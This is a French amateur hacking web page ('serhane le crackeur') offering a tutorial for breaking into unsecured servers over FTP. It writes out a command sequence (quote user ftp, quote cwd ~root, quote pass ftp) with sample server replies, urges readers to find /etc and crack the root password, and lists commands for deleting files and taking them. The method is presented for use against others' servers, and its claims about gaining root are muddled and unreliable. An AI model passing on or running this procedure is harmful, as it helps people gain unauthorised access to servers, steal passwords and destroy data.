serhane le crackeur
crackage et piratage
=> الإختراق عن طريق الدوس
  Attaque sur FTP des crakeur
 

Attaque sur FTP
        On ne m'a pas encore fait le reproche de ne pas donner assez de techniques de hacking dans la rubrique hacking mais dans un désir d'anticiper ce reproche, je vais donner une manière de hacker un serveur non sécurisé par ftp.
        D'abord on va expliquer ce qu'est ftp. ftp c'est un protocole qui permet de transmettre des fichiers d'un ordinateur à un autre. Les ports qui lui sont attribués sont les n°20 et 21. Quand vous allez sur un site de Warez pour choper des progs crackés vous passez généralement par ftp, vous voulez télécharger une page WEB, c'est aussi par ftp, quand vous vous rendez sur un serveur en tant que user, c'est aussi des fois par ftp. Si vous êtes sous windows, pour ouvrir une fenêtre ftp, il faut faire: Démarrer, Exécuter, et taper "ftp -n".
        Bon, faut pas pousser non plus, c'est pas aussi simple que ça de hacker un serveur par ftp, il suffit pas d'ouvrir la fenêtre ftp, c'est plus compliqué car chaque serveur demande un login et un password pour chaque user. 

        Le truc que je vais vous donner ne marche que sur les serveurs non sécurisés alors n'essayez pas ça sur le Pentagone, ça marchera pas. On parle toujours du Pentagone, de la CIA, de la Nasa... mais il y a pleins de serveurs sécurisés dans le monde et ils ne sont pas forcement gouvernementaux, loin de là... 

        Je vous donne le truc et on en reparle après: 

                      open url_du_site
                      quote user ftp
                      quote cwd ~root
                      quote pass ftp        Mettez des espaces ou je les ai mis et tout ce passera bien. 

Exemple:         
                      open www.site.com
                      quote user ftp
                      quote cwd ~root
                      quote pass ftp        Ici le serveur a comme adresse url: http://www.site.com/

        Ces instructions doivent être entrées dans un fenêtre ressemblant beaucoup à celle du dos, à chaque ligne, il y aura marqué "ftp>".
        Pour ouvrir cette fenêtre on procède comme expliqué précedement. Une fois connecté à un site (après avoir tapé: open url_du_site), vous verrez apparaitre "Connected to url_du_site". Il se peut qu'après vous être connecté à un serveur vous receviez le message suivant: "Ce serveur est protégé" ou "attention aux malversations que vous pourrez faire" ou "regardes par la fenêtre, les flics sont déjà en bas de chez toi"... Dans ce cas là c'est même pas la peine d'aller plus loin car à 99% le serveur est sécurisé car si l'administrateur réseau a pu être assez consciencieux pour mettre un message d'avertissement, il l'est assez pour nous empêcher de pénétrer de cette manière dans sont serveur. :-(
Il se peut même qu'une fois connecté, vous voyez "Connexion closed by remote host.", là c'est encore plus vache, c'est que le serveur n'est pas accessible de cette manière par ftp. De cette manière seulement....  

        On va voir maintenant ce que le serveur répond en fonction de ce que l'on marque et de si oui ou non on pourra rentrer dedans:
Ce qui est en bleu c'est ce que l'on tape
Ce qui est en jaune c'est ce que le serveur répond
Ce qui est en blanc c'est soit ftp soit des remarques de ma part
  Serveur que l'on pourra hacker par ce moyen : Serveur que l'on ne pourra pas hacker par ce moyen :
ftp>open www.site.com open www.site.com
Connected to www.site.com
220 websrv1 Microsoft FTP Service (Version 4.0). Connected to www.site.com
websrv1 Microsoft FTP Service (Version 4.0).
"Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut même qu'il y ait marqué la
date et l'heure de la dernière mise à jour." "Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut même qu'il y ait marqué la
date et l'heure de la dernière mise à jour."
ftp>quote user ftp ftp>quote user ftp
331 Anonymous acces allowed, send identify (e-mail name) as password. 331 Password required for ftp.
ftp>quote cwd ~root ftp>quote cwd ~root
530 Please login with USER and PASS. 530 Please login with USER and PASS.
ftp>quote pass ftp ftp>quote pass ftp
230 Anonymous user logged in. 530 User ftp cannot log in.
Voilà, logiquement et sauf erreur vous êtes root ou tout du moins user, si c'est le cas, il faut trouver /etc puis décrypter le password et là vous vous connecterez en tant que root.     :-) Bon, bah là, rien à faire avec cette méthode, c'est probablement un serveur dit "secure", quoi que... Bref une seule remarque:                          :-(


        Une fois que vous êtes root ou user, ca sont les commandes ftp qui s'appliquent (pas les commandes dos ni les commandes unix): 

          mkdir : pour créer un répertoire (exemple: mkdir site crée le répertoire site).
          rmdir : pour supprimer un répertoire (exemple: rmdir site supprime le répertoire site).
          pwd : pour voir ou vous êtes sur le disque.
          cd : pour aller dans un répertoire (exemple: cd site pour aller dans le répertoire site).
          dir : pour voir le contenu de la racine ou du répertoire où vous êtes.
          cd / : pour revenir à la racine. Ne pas oublier l'espace entre cd et /.
          cd .. : pour revenir au répertoire précédent. Ne pas oublier l'espace entre cd et ..
          del : pour supprimer un fichier (exemple: del site.txt supprime le fichier site.txt).
          get : pour prendre un fichier et le mettre sur votre bureau (exemple: get site.txt vous donne le fichier site.txt) 

       Pour quitter ftp, vous n'avez qu'à taper "quit".


par serhane le crakeur

 
  
  google-site-verification=0bcz4aeJDJ9T3dUZ30OBJLMEF867Z1npIGezBoHmXok  
 
Ce site web a été créé gratuitement avec Ma-page.fr. Tu veux aussi ton propre site web ?
S'inscrire gratuitement